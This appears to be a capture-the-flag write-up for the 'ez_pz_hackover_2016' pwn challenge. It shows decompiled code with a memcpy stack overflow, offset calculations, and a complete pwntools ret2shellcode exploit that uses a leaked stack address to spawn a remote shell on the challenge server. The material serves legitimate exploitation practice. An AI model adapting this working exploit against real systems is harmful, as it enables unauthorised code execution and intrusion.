
ez_pz_hackover_2016

Ubuntu16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/ez_pz_hackover_2016/ez_pz_hackover_2016'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments

//没有开保护

IDA

chall()函数

/*
 * Decompiled (IDA) listing of chall(): reads a line with fgets, strips the
 * first newline, echoes it back and, only when the input equals "crashme",
 * hands the buffer to vuln() with a fixed length of 0x400.
 *
 * Returns: the strcmp() result when the input is not "crashme", otherwise
 * whatever vuln() returns (the decompiler shows it stored into an int).
 */
int chall()
{
size_t v0; // eax
int result; // eax
char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF
_BYTE *v3; // [esp+40Ch] [ebp-Ch]

printf("Yippie, lets crash: %p\n", s); // prints the address of s: discloses a stack address to whoever is talking to the program
printf("Whats your name?\n");
printf("> ");
fgets(s, 1023, stdin); // at most 1022 bytes plus the NUL terminator; fits in s[1024]
v0 = strlen(s);
v3 = memchr(s, 10, v0); // find the first '\n' (10) within the bytes read
if ( v3 )
*v3 = 0; // truncate the string at the newline
printf("\nWelcome %s!\n", s);
result = strcmp(s, "crashme");
if ( !result )
result = vuln((char)s, 0x400u); // a constant length of 0x400 is passed, not the number of bytes actually read (v0);
                                // the decompiler renders the first argument as s narrowed to a single char
return result;
}

vuln() //一个字符串复制函数

/*
 * Decompiled (IDA) listing of vuln(): copies n bytes, starting at the
 * address of its own first parameter, into a 50-byte stack buffer.
 *
 * The copy length n is caller-controlled (chall() passes 0x400) and is
 * never compared against sizeof dest, so any n larger than 50 writes past
 * the end of dest into the rest of the stack frame -- a stack-based buffer
 * overflow. A corrected version bounds the copy before calling memcpy,
 * e.g. `if (n > sizeof dest) n = sizeof dest;`, or drops the pattern of
 * copying out of a by-value parameter altogether.
 *
 * Returns: memcpy's return value, i.e. the address of the local dest,
 * which is dangling as soon as the function returns.
 */
void *__cdecl vuln(char src, size_t n)
{
char dest[50]; // [esp+6h] [ebp-32h] BYREF

return memcpy(dest, &src, n); // dest is only 0x32 bytes; this memcpy is the stack overflow
}

0x02


思路 ret2shellcode

1.用crashme\x00 进入vuln()实现溢出

2.计算偏移

​ s - rbp 0x16

​ s - shellcode 0x1c

s 0x16
rbp 0x4
ret [rbp-shellcode]

0x03


# Writeup script: reads the stack address that chall() prints, then sends the
# "crashme" trigger followed by the payload described in the section above.
# Needs pwntools; the host/port below are the remote challenge instance.
from pwn import *

context(arch='i386', log_level='debug')  # 32-bit target (matches the checksec output above); debug logs every send/recv
io = remote('node4.buuoj.cn', 26257)
# io = process(['./ez_pz_hackover_2016'])
# elf = ELF('./ez_pz_hackover_2016')

io.recvuntil(b'crash: ')  # consume "Yippie, lets crash: " printed by chall()
stack_addr: int = int(io.recv(10), 16)  # next 10 bytes are expected to be "0x" + 8 hex digits: the address of s
print('[+] stack_address -->', hex(stack_addr))
padding = 0x32 + 0x4  # NOTE(review): computed but never used below
shellcode = asm(shellcraft.sh())
offset = 0x1c  # NOTE(review): never used below; the literal 0x1c is repeated in the payload line
payload: bytes = b"crashme\x00"+b"a"*18+p32(stack_addr-0x1c)+shellcode  # "crashme\0" satisfies the strcmp in chall(); the rest follows the offsets worked out above
delim = b'> '

io.sendlineafter(delim, payload)  # wait for the "> " prompt, then send the payload
io.interactive()

